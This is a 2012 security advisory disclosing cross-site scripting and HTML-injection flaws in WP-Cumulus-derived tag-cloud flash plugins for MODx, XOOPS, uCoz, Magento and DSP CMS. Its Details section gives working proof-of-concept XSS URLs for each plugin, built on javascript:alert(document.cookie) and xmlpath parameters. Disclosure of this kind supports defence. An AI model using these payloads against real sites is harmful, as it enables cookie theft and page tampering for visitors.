Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27544
HistoryJan 09, 2012 - 12:00 a.m.

Vulnerabilities in plugins for MODx CMS, XOOPS, uCoz, Magento and DSP CMS

2012-01-0900:00:00
vulners.com
22

Hello 3APA3A!

Besides tens millions of vulnerable web sites with affected flash files and vulnerable multiple plugins for different engines, which I've wrote about earlier, there are a lot of other vulnerable plugins. Here are new ones (some of them are vulnerable to two XSS holes). There are Cross-Site Scripting vulnerabilities in plugins for engines MODx CMS, XOOPS, uCoz, Magento and DSP CMS, which all are ports of WP-Cumulus. A lot of other such plugins for other engines can be vulnerable.

This XSS is similar to XSS vulnerability in WP-Cumulus, which I've disclosed in 2009 (http://securityvulns.com/Wdocument842.html). Because these plugins are using tagcloud.swf made by author of WP-Cumulus. About such vulnerabilities I wrote in 2009-2011, particularly about millions of flash files tagcloud.swf which are vulnerable to XSS attacks I mentioned in my article XSS vulnerabilities in 34 millions flash files (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).


Affected products:

Vulnerable are all versions of Tagcloud for MODx CMS.

Vulnerable is Сumulus for XOOPS 1.0, which is also included in ExtendedPackRU for XOOPS.

Vulnerable are all versions of uCoz-Cumulus for uCoz.

Vulnerable are all versions of Cumulus Tagcloud for Magento.

Vulnerable are all versions of Сumulus for DSP CMS.

Some of these plugins are vulnerable to one and some to two XSS holes - as to first hole in WP-Cumulus, which I've disclosed in 2009, as to second hole, which I've disclosed in 2011.

Besides these ones and those which I've disclosed in 2009-2011, a lot of other such plugins for other engines can be vulnerable.


Details:

XSS (WASC-08):

Tagcloud for MODx CMS:

http://site/assets/files/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Сumulus for XOOPS:

http://site/modules/cumulus/include/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

uCoz-Cumulus for uCoz:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Cumulus Tagcloud for Magento:

http://site/frontend/tag/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/frontend/tag/tagcloud.swf?xmlpath=xss.xml

http://site/frontend/tag/tagcloud.swf?xmlpath=http://site/xss.xml

Via parameters mode and xmlpath.

Сumulus for DSP CMS:

http://site/engine/tags/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS (http://websecurity.com.ua/5476/). Also it's possible to conduct (like in WP-Cumulus) HTML Injection attack.


Plugins with fixed version of swf-file:

Because in November 2009, after my informing, Roy Tanck (developer of WP-Cumulus) fixed only XSS vector, but not HTML Injection vector, it's still possible to conduct HTML Injection attacks (for injecting arbitrary links) to all versions of this swf-file (which can be found under name tagcloud.swf and other names). Including fixed version of the swf-file, with fixed XSS hole.

So all those plugins, which developers fixed this vulnerability (after my informing or by informing from Roy or other people) by updating swf-file, are still vulnerable to HTML Injection. These five plugins are using non-fixed version of swf-file.

I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5601/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua